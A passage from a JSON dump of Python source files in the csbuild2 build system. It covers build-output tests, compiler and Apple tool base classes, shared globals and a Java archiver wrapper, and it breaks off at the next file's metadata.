\"A\":\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/target.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/target.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/target2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/target2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/unspecial.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/unspecial.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tif toolchain in [\"B\", \"C\", \"D\"]:\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/toolchain.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/toolchain.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/toolchain2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\t\tos.remove(\"out/toolchain2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/{}.{}.{}.{}\".format(platform.system(), architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/{}.{}.{}.{}\".format(platform.system(), architecture, target, toolchain))\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/{}2.{}.{}.{}\".format(platform.system(), architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/{}2.{}.{}.{}\".format(platform.system(), architecture, target, toolchain))\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/special.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/special.{}.{}.{}\".format(architecture, target, toolchain))\n\t\t\t\t\t\tself.assertTrue(os.path.exists(\"out/special2.{}.{}.{}\".format(architecture, target, toolchain)))\n\t\t\t\t\t\tos.remove(\"out/special2.{}.{}.{}\".format(architecture, target, toolchain))\n\n\t\t\t\t\tself.assertFalse(os.listdir(\"out\"), \"Out directory still contains {}\".format(os.listdir(\"out\")))\n\n\t\t\t\t\tself.assertMakeSucceeds(\"--toolchain\", toolchain, \"--target\", target, \"--architecture\", architecture, \"--clean\")\n\n\tdef testInvalidCombination(self):\n\t\t\"\"\"Test an invalid combination to make sure csbuild doesn't try to build when there are no valid projects for the given combination\"\"\"\n\t\tself.assertMakeFails(\n\t\t\t\"No projects were found supporting the requested architecture, toolchain, target, and platform combination\",\n\t\t\t\"--toolchain\", \"A\", \"--target\", \"B\", \"--architecture\", \"E\"\n\t\t)\n" }, { "alpha_fraction": 0.6540605425834656, "alphanum_fraction": 0.6554166078567505, "avg_line_length": 32.35175704956055, "blob_id": "d9d65389dc2f848d67d1755dae1c0703a707cf8e", "content_id": "1d6b045e11f7d5bfe94248dcc89c1f46a888b2a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6637, "license_type": "no_license", "max_line_length": 153, "num_lines": 199, "path": "/csbuild/tools/cpp_compilers/cpp_compiler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: cpp_compiler_base\n\t:synopsis: Basic class for C++ compilers\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import \\\n\tHasDebugLevel, \\\n\tHasDebugRuntime, \\\n\tHasDefines, \\\n\tHasIncludeDirectories, \\\n\tHasOptimizationLevel, \\\n\tHasStaticRuntime, \\\n\tHasCcLanguageStandard, \\\n\tHasCxxLanguageStandard \\\n\nfrom ... import commands, log\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass CppCompilerBase(\n\tHasDebugLevel,\n\tHasDebugRuntime,\n\tHasDefines,\n\tHasIncludeDirectories,\n\tHasOptimizationLevel,\n\tHasStaticRuntime,\n\tHasCcLanguageStandard,\n\tHasCxxLanguageStandard\n):\n\t\"\"\"\n\tBase class for C++ compilers\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputFiles={\".cpp\", \".c\", \".cc\", \".cxx\"}\n\tdependencies={\".gch\", \".pch\"}\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._globalFlags = projectSettings.get(\"globalFlags\", [])\n\t\tself._cFlags = projectSettings.get(\"cFlags\", [])\n\t\tself._cxxFlags = projectSettings.get(\"cxxFlags\", [])\n\n\t\tHasDebugLevel.__init__(self, projectSettings)\n\t\tHasDebugRuntime.__init__(self, projectSettings)\n\t\tHasDefines.__init__(self, projectSettings)\n\t\tHasIncludeDirectories.__init__(self, projectSettings)\n\t\tHasOptimizationLevel.__init__(self, projectSettings)\n\t\tHasStaticRuntime.__init__(self, projectSettings)\n\t\tHasCcLanguageStandard.__init__(self, projectSettings)\n\t\tHasCxxLanguageStandard.__init__(self, projectSettings)\n\n\t\tself._projectTypeDefines = {\n\t\t\tcsbuild.ProjectType.Application: \"CSB_APPLICATION=1\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"CSB_SHARED_LIBRARY=1\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \"CSB_STATIC_LIBRARY=1\",\n\t\t}\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddCompilerFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler flags that are applid to both C and C++ files.\n\n\t\t:param flags: List of flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"globalFlags\", flags)\n\n\t@staticmethod\n\tdef AddCompilerCcFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler C flags.\n\n\t\t:param flags: List of C flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"cFlags\", flags)\n\n\t@staticmethod\n\tdef AddCompilerCxxFlags(*flags):\n\t\t\"\"\"\n\t\tAdd compiler C++ flags.\n\n\t\t:param flags: List of C++ flags\n\t\t:type flags: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.ExtendList(\"cxxFlags\", flags)\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFile):\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tHasDebugLevel.SetupForProject(self, project)\n\t\tHasDebugRuntime.SetupForProject(self, project)\n\t\tHasDefines.SetupForProject(self, project)\n\t\tHasIncludeDirectories.SetupForProject(self, project)\n\t\tHasOptimizationLevel.SetupForProject(self, project)\n\t\tHasStaticRuntime.SetupForProject(self, project)\n\t\tHasCcLanguageStandard.SetupForProject(self, project)\n\t\tHasCxxLanguageStandard.SetupForProject(self, project)\n\n\t\tif project.projectType in self._projectTypeDefines:\n\t\t\tself._defines.add(self._projectTypeDefines[project.projectType])\n\n\t\tself._defines.add(\"CSB_TARGET_{}=1\".format(project.targetName.upper()))\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Compiling {} ({}-{}-{})...\",\n\t\t\tinputFile,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\t_, extension = os.path.splitext(inputFile.filename)\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile, extension in {\".cpp\", \".cc\", \".cxx\", \".mm\"}), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n" }, { "alpha_fraction": 0.7105719447135925, "alphanum_fraction": 0.7157712578773499, "avg_line_length": 20.637500762939453, "blob_id": "5cfee9726e10ba94ac94ae63186da19fc3de90df", "content_id": "3c78332121ae71ddc7908b1e76b801d7803751d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3462, "license_type": "no_license", "max_line_length": 92, "num_lines": 160, "path": "/csbuild/_utils/shared_globals.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: shared_globals\n\t:synopsis: Global variables that need to be accessed by multiple modules\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom . import dag\n\nerrors = []\nwarnings = []\ncolorSupported = False\nlogFile = None\n\ntoolchains = {}\n\nsortedProjects = dag.DAG(lambda x: x.name)\nallTargets = set()\nallToolchains = set()\nallArchitectures = set()\n\nclass GeneratorData(object):\n\t\"\"\"Contains data for a solution generator\"\"\"\n\tdef __init__(self, projectTools, solutionTool):\n\t\tself.projectTools = projectTools\n\t\tself.solutionTool = solutionTool\n\nallGenerators = {}\nallGeneratorTools = set()\n\nsolutionGeneratorType = \"\"\n\nrunPerfReport = None\n\ntoolchainGroups = {}\n\nsolutionPath = \"\"\nsolutionArgs = \"\"\n\nclass RunMode(object):\n\t\"\"\"\n\t'enum' representing the way csbuild has been invoked\n\t\"\"\"\n\tNormal = 0\n\tHelp = 1\n\tVersion = 2\n\tGenerateSolution = 3\n\tGenerateDependencyGraph = 4\n\tQUALAP = 5\n\nrunMode = None\n\ndefaultTarget = \"release\"\n\nparser = None\n\nclass Verbosity(object):\n\t\"\"\"\n\t'enum' representing verbosity\n\t\"\"\"\n\tVerbose = 0\n\tNormal = 1\n\tQuiet = 2\n\tMute = 3\n\n#Has to default to Verbose for tests to print Info since they don't take command line params\nverbosity = Verbosity.Verbose\n\nshowCommands = False\n\nprojectMap = {}\n\nprojectBuildList = []\n\ncommandOutputThread = None\n\ncolumns = 0\nclearBar = \"\"\n\nstartTime = 0\n\ntotalBuilds = 0\ncompletedBuilds = 0\n\nbuildStartedHooks = set()\nbuildFinishedHooks = set()\n\nclass InMemoryOnlySettings(object):\n\t\"\"\"Mockup class for settings_manager.SettingsManager\"\"\"\n\tdef __init__(self):\n\t\tself.dict = {}\n\n\tdef Get(self, key, default=None):\n\t\t\"\"\"\n\t\tGet a value from the dict\n\n\t\t:param key: key\n\t\t:type key: str\n\t\t:param default: value returned if missing\n\t\t:type default: any\n\t\t:return: the value for this key, or default\n\t\t:rtype: any\n\t\t\"\"\"\n\t\treturn self.dict.get(key, default)\n\n\tdef Save(self, key, value):\n\t\t\"\"\"\n\t\tSave a value to the dict\n\n\t\t:param key: The key\n\t\t:type key: str\n\t\t:param value: The value\n\t\t:type value: any\n\t\t\"\"\"\n\t\tself.dict[key] = value\n\n\tdef Persist(self):\n\t\t\"\"\"\n\t\tNOP for this class.\n\t\t\"\"\"\n\t\tpass\n\n\tdef Clear(self):\n\t\t\"\"\"\n\t\tNOP for this class.\n\t\t\"\"\"\n\t\tpass\n\n\tdef Delete(self, key):\n\t\t\"\"\"\n\t\tRemove a key from the dict if it exists, nop otherwise\n\n\t\t:param key: key to remove\n\t\t:type key: str\n\t\t\"\"\"\n\t\tself.dict.pop(key, None)\n\nsettings = InMemoryOnlySettings()\n" }, { "alpha_fraction": 0.7656612396240234, "alphanum_fraction": 0.7703016400337219, "avg_line_length": 40.0476188659668, "blob_id": "338d12d14e5462f88ea7865950ba7b1f1928dd8b", "content_id": "5195d84ed564093dab6c613c14ab3ac993be3d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1724, "license_type": "no_license", "max_line_length": 117, "num_lines": 42, "path": "/csbuild/_utils/string_abc.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: string_abc\n\t:synopsis: Provides an abstract base class to provide the same role as basestring in a python 2 and 3 compatible way\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport abc\nfrom . import StrType, BytesType\nfrom .decorators import MetaClass\n\n@MetaClass(abc.ABCMeta)\nclass String(object):\n\t\"\"\"\n\tAbstract base class representing both str and bytes in python3, and both unicode and str in python 2.\n\t\"\"\"\n\tpass\n\n#pylint's not very intelligent about the @MetaClass decorator...\n\nString.register(StrType) # pylint: disable=no-member\nString.register(BytesType) # pylint: disable=no-member\n" }, { "alpha_fraction": 0.6429128646850586, "alphanum_fraction": 0.6451235413551331, "avg_line_length": 37.258705139160156, "blob_id": "bc439a6142608f2acbf54ffbf1020d1320cb5043", "content_id": "4fe6742e63cf3c927ddca5af8e6131bbf995c19c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7690, "license_type": "no_license", "max_line_length": 155, "num_lines": 201, "path": "/csbuild/tools/common/apple_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: apple_tool_base\n\t:synopsis: Abstract base class for macOS tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\nimport re\nimport subprocess\n\nfrom abc import ABCMeta\n\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\nfrom ... import commands\n\n\ndef _ignore(_):\n\tpass\n\ndef _noLogOnRun(shared, msg):\n\t_ignore(shared)\n\t_ignore(msg)\n\n\nclass AppleHostToolInfo(object):\n\t\"\"\"\n\tClass for maintaining data output by Xcode tools installed on the host OS.\n\t\"\"\"\n\tInstance = None\n\n\tdef __init__(self):\n\t\ttry:\n\t\t\t# Verify the 'xcrun' program exists.\n\t\t\tsubprocess.call([\"xcrun\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'xcrun' could not be found; please make sure you have installed Xcode and the command line build tools\")\n\n\t\ttry:\n\t\t\t# Verify the 'xcode-select' program exists.\n\t\t\tsubprocess.call([\"xcode-select\"], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Program 'xcode-select' could not be found; please make sure you have installed Xcode and the command line build tools\")\n\n\t\t_, activeXcodeDevPath, _ = commands.Run([\"xcode-select\", \"-p\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\t_, defaultMacOsSdkPath, _ = commands.Run([\"xcrun\", \"--sdk\", \"macosx\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneOsSdkPath, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphoneos\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneSimSdkPath, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphonesimulator\", \"--show-sdk-path\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\t_, defaultMacOsSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"macosx\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneOsSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphoneos\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\t\t_, defaultIPhoneSimSdkVersion, _, = commands.Run([\"xcrun\", \"--sdk\", \"iphonesimulator\", \"--show-sdk-version\"], stdout = _noLogOnRun, stderr = _noLogOnRun)\n\n\t\tself.activeXcodeToolchainPath = os.path.join(activeXcodeDevPath.strip(), \"Toolchains\", \"XcodeDefault.xctoolchain\")\n\n\t\tself.defaultMacOsSdkPath = defaultMacOsSdkPath.strip()\n\t\tself.defaultIPhoneOsSdkPath = defaultIPhoneOsSdkPath.strip()\n\t\tself.defaultIPhoneSimSdkPath = defaultIPhoneSimSdkPath.strip()\n\n\t\tself.defaultMacOsSdkVersion = defaultMacOsSdkVersion.strip()\n\t\tself.defaultIPhoneOsSdkVersion = defaultIPhoneOsSdkVersion.strip()\n\t\tself.defaultIPhoneSimSdkVersion = defaultIPhoneSimSdkVersion.strip()\n\n\n@MetaClass(ABCMeta)\nclass AppleToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targetting Apple platforms.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._frameworkDirectories = projectSettings.get(\"frameworkDirectories\", ordered_set.OrderedSet())\n\t\tself._frameworks = projectSettings.get(\"frameworks\", ordered_set.OrderedSet())\n\n\t\t# Add the default library framework locations.\n\t\tself._frameworkDirectories.update([\n\t\t\tx\n\t\t\tfor x in [\n\t\t\t\t\"/Library/Frameworks\",\n\t\t\t\tos.path.expanduser(\"~/Library/Frameworks\"),\n\t\t\t]\n\t\t\tif os.access(x, os.F_OK)\n\t\t])\n\n\t\tself._appleToolInfo = None\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef AddFrameworkDirectories(*dirs):\n\t\t\"\"\"\n\t\tAdd directories to search for frameworks.\n\n\t\t:param dirs: List of directories\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"frameworkDirectories\", [os.path.abspath(directory) for directory in dirs])\n\n\t@staticmethod\n\tdef AddFrameworks(*frameworks):\n\t\t\"\"\"\n\t\tAdd frameworks to the current project.\n\n\t\t:param frameworks: List of frameworks.\n\t\t:type frameworks: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"frameworks\", frameworks)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\t\t# Create the mac tool info if the singleton doesn't already exist.\n\t\tif not AppleHostToolInfo.Instance:\n\t\t\tAppleHostToolInfo.Instance = AppleHostToolInfo()\n\n\t\tself._appleToolInfo = AppleHostToolInfo.Instance\n\n\n@MetaClass(ABCMeta)\nclass MacOsToolBase(AppleToolBase):\n\t\"\"\"\n\tParent class for all tools targetting the macOS platform.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tAppleToolBase.__init__(self, projectSettings)\n\n\t\tself._macOsVersionMin = projectSettings.get(\"macOsVersionMin\", None)\n\n\t\t# When a version is not provided, default to the current version of the OS.\n\t\tif not self._macOsVersionMin:\n\t\t\tself._macOsVersionMin = self._getMacOsCurrentVersion()\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\tdef SetMacOsVersionMin(self, version):\n\t\t\"\"\"\n\t\tSet the minimum version of macOS to build for.\n\n\t\t:param version: macOS version (e.g., \"10.8\", \"10.9\", \"10.10\", etc)\n\t\t:type version: str\n\t\t\"\"\"\n\t\tself._macOsVersionMin = csbuild.currentPlan.SetValue(\"macOsVersionMin\", version)\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getMacOsCurrentVersion(self):\n\t\tcurrentVersion = subprocess.check_output([\"sw_vers\", \"-productVersion\"]).decode(\"utf-8\")\n\n\t\t# The version number is returned in the \"x.y.z\" format, but we only need \"x.y\".\n\t\tversionRegex = re.compile(r\"(\\d+).(\\d+)\")\n\t\tmatch = versionRegex.match(currentVersion)\n\t\tassert match, f\"Failed to parse macOS version: {currentVersion}\"\n\n\t\treturn f\"{match.group(1)}.{match.group(2)}\"\n" }, { "alpha_fraction": 0.6446098685264587, "alphanum_fraction": 0.6457127332687378, "avg_line_length": 36.01020431518555, "blob_id": "28512cdef26fcfa8194f8a1c1834d5cf8a22fee2", "content_id": "798cfc17342e49286b800dbdd11a4ff28b5ced3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3627, "license_type": "no_license", "max_line_length": 124, "num_lines": 98, "path": "/csbuild/tools/java_archivers/oracle_java_archiver.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: oracle_java_archiver\n\t:synopsis: Oracle-compatible Java archiver tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport os\nimport subprocess\n\nfrom .java_archiver_base import JavaArchiverBase\n\nclass OracleJavaArchiver(JavaArchiverBase):\n\t\"\"\"\n\tOracle-compatible Java archiver implementation.\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tJavaArchiverBase.__init__(self, projectSettings)\n\n\t\tself._javaArchiverPath = os.path.join(self._javaBinPath, \"jar{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\n\t\ttry:\n\t\t\tsubprocess.call([self._javaArchiverPath], stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n\t\texcept:\n\t\t\traise IOError(\"Oracle Java archiver not found at path: {}\".format(self._javaArchiverPath))\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project):\n\t\treturn tuple({ self._getOutputFilePath(project) })\n\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\tcmd = [self._javaArchiverPath] \\\n\t\t\t+ self._getSwitchArgs() \\\n\t\t\t+ self._getOutputArgs(project) \\\n\t\t\t+ self._getEntryPointClassArgs() \\\n\t\t\t+ self._getInputArgs(classRootPath)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getOutputFilePath(self, project):\n\t\treturn os.path.join(project.outputDir, \"{}.jar\".format(project.outputName))\n\n\tdef _getOutputArgs(self, project):\n\t\treturn [self._getOutputFilePath(project)]\n\n\tdef _getSwitchArgs(self):\n\t\treturn [\"cf\" + \"e\" if self._entryPointClass else \"\"]\n\n\tdef _getEntryPointClassArgs(self):\n\t\treturn [self._entryPointClass] if self._entryPointClass else []\n\n\tdef _getInputArgs(self, classRootPath):\n\t\trootItems = os.listdir(classRootPath)\n\t\targs = []\n\n\t\t# Pass in only the items in the class root directory since the Java archiver\n\t\t# will recursively find class files in directories. This is important so the\n\t\t# layout of the files in the final archive have the correct directory structure.\n\t\tfor item in rootItems:\n\t\t\targs.extend([\n\t\t\t\t\"-C\",\n\t\t\t\tclassRootPath,\n\t\t\t\titem\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.6346724033355713, "alphanum_fraction": 0.6443785429000854, "avg_line_length": 34.66345977783203, "blob_id": "0d1bbf0bd9facf9235fd38fab3955530488501a1", "content_id": "f96425d58039ca5ffa78fa6cd2fde6c9236a8ee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3709, "license_type": "no_license", "max_line_length": 131, "num_lines": 104, "path": "/csbuild/tools/assemblers/xbox_360_assembler.py", "repo_name": 